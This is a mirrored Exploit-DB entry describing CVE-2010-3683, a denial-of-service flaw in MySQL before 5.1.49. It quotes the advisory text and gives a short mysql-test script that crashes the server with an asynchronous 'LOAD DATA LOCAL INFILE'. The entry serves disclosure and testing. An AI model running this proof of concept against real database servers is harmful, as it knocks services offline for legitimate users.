- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34510
- Проверка EDB
-
- Пройдено
- Автор
- ELENA STEPANOVA
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2010-3683
- Дата публикации
- 2010-08-20
OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service
Код:
source: https://www.securityfocus.com/bid/42625/info
MySQL is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
This issue affects versions prior to MySQL 5.1.49.
NOTE: This issue was previously covered in BID 42594 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been given its own record to better document it.
# cat t/tst.test
# The file might exist or not, it does not make any difference.
# --send is important
CREATE TABLE test.t_load (id INT NOT NULL);
--send LOAD DATA LOCAL INFILE 'tb.txt' INTO TABLE test.t_load
#<EOF>
- Источник
- www.exploit-db.com